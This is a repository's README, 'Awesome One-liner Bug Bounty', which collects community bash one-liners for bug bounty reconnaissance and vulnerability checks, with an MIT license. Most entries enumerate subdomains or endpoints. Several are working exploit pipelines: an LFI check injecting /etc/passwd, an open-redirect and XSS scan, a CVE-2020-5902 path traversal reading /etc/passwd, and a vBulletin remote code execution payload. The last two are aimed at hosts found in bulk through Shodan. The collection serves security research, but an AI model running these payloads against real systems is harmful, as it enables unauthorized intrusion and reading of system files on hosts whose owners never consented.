/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2020 Dwi Siswanto

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Awesome One-liner Bug Bounty [![Awesome](https://awesome.re/badge-flat2.svg)](https://awesome.re)
> A collection of awesome one-liner scripts especially for bug bounty.

This repository stores and houses various one-liners for bug bounty tips, provided by me as well as contributed by the community. Your contributions and suggestions are heartily♥ welcome.

---

### Local File Inclusion
> @dwisiswant0

```bash
gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
```

### Open-redirect
> @dwisiswant0

```bash
export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
```

### XSS
> @cihanmehmet

```bash
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
```

### CVE-2020-5902
> @Madrobot_

```bash
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
```

### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
> @Madrobot_

```bash
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
```

### Find JS Files
> @D0cK3rG33k

```bash
assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g');echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done
```

### Extract Endpoints from JS File
> @renniepak

```bash
cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u
```

### Get CIDR & Orgs from Target Lists
> @steve_mcilwain

```bash
for DOMAIN in $(cat domains.txt);do echo $(for ip in $(dig a $DOMAIN +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; done | uniq); done
```

### Get Subdomains from RapidDNS.io
> @andirrahmani1

```bash
curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "
```

### Get Subdomains from BufferOver.run
> @\_ayoubfathi\_

```bash
curl -s https://dns.bufferover.run/dns?q=.DOMAIN.com |jq -r .FDNS_A[]|cut -d',' -f2|sort -u
```

### Get Subdomains from Riddler.io
> @pikpikcu

```bash
curl -s "https://riddler.io/search/exportcsv?q=pld:domain.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```

### Get Subdomains from VirusTotal
> @pikpikcu

```bash
curl -s "https://www.virustotal.com/ui/domains/domain.com/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```

### Get Subdomains from CertSpotter
> @pikpikcu

```bash
curl -s "https://certspotter.com/api/v0/certs?domain=domain.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```

### Get Subdomains from Archive
> @pikpikcu

```bash
curl -s "http://web.archive.org/cdx/search/cdx?url=*.domain.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u
```

### Get Subdomains from JLDC
> @pikpikcu

```bash
curl -s "https://jldc.me/anubis/subdomains/domain.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```

### Get Subdomains from crt.sh
> @vict0ni

```bash
curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
```

### Sorted & Tested Domains from Recon.dev
> @stokfedrik

```bash
curl "https://recon.dev/api/search?key=apikey&domain=example.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u |httpx -silent
```

### Find All Allocated IP Ranges for an ASN Given an IP Address
> wains.be

```bash
whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net $1 | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n
```

### Extract IPs from a File
> @emenalf

```bash
grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt
```

### Port Scan without CloudFlare
> @dwisiswant0

```bash
subfinder -silent -d uber.com | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe
```

### Create Custom Wordlists
> @tomnomnom

```bash
gau domain.com| unfurl -u keys | tee -a wordlist.txt ; gau domain.com | unfurl -u paths|tee -a ends.txt; sed 's#/#\n#g' ends.txt | sort -u | tee -a wordlist.txt | sort -u ;rm ends.txt ; sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' wordlist.txt
```

```bash
cat domains.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a words.txt
```

### Extract Juicy Information
> @Prial Islam Khan

```bash
for sub in $(cat domains.txt);do /usr/bin/gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq |egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a file.txt ;done
```

### Find Subdomain Takeovers
> @hahwul

```bash
subfinder -d {target} >> domains ; assetfinder -subs-only {target} >> domains ; amass enum -norecursive -noalts -d {target} >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;
```

### Get Multiple Targets' Custom URLs from ParamSpider
> @hahwul

```bash
cat domains | xargs -I % python3 ~/tool/ParamSpider/paramspider.py -l high -o ./spidering/paramspider/% -d % ;
```

### URL Probing with cURL + Parallel
> @akita_zen

```bash
cat alive-subdomains.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk
```

### Dump In-scope Assets from `chaos-bugbounty-list`
> @dwisiswant0

```bash
curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'
```

### Dump In-scope Assets from `bounty-targets-data`
> @dwisiswant0

#### HackerOne Programs

```bash
curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'
```

#### BugCrowd Programs

```bash
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
```

#### Intigriti Programs

```bash
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'
```

#### YesWeHack Programs

```bash
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
```

#### HackenProof Programs

```bash
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'
```

#### Federacy Programs

```bash
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
```

### Get All the URLs out of a sitemap.xml
> @healthyoutlet

```bash
curl -s domain.com/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'
```
--------------------------------------------------------------------------------